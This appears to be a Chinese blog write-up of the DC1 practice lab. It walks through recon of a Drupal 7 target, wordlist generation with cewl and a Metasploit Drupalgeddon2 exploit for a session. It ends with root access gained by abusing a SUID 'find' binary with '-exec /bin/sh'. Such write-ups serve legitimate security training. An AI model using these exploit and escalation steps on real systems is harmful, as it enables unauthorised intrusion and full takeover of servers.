DC1

cms信息 使用的是Drupal的cms

DC1

端口信息 开开启了22端口,80端口,111端口

DC1

目录信息 扫到敏感目录 http://192.168.0.119/robots.txt

DC1

通过cewl收集敏感信息并生成字典

cewl http://192.168.0.119 -w passwd.txt

DC1

2.漏洞分析与利用

通过robots.txt查看敏感目录内容获取中重要信息

可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal

DC1

搜索相关漏洞

进入msfconsle ——> search Drupal

DC1

尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2

使用该payload后查看目标是否在可攻击版本范围内

DC1

设置攻击目标,得到session会话

DC1

3.尝试提权

DC1

内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权

python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty

find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来

DC1

发现常用于usid提权的工具find

cd /tmp #切换到tmp目录下

touch luojun #创建lj文件

find luojun -exec "whoami" \; #查询lj文件并执行whoami命令

DC1

成功发现执行命令的是root权限

find luojun -exec "/bin/bash" \; #将bash的shell反弹出来,发现失败了

DC1

find luojun -exec "/bin/sh" \; #将sh的shell反弹出来,发现成功,获得root权限

DC1

提权成功,接下来任意妄为寻找flag

相关文章:

  • 2021-12-16
  • 2021-11-07
  • 2021-11-05
猜你喜欢
  • 2021-07-21
  • 2021-09-16
  • 2021-06-05
  • 2021-07-08
  • 2022-01-06
  • 2021-04-02
  • 2022-12-23
相关资源
相似解决方案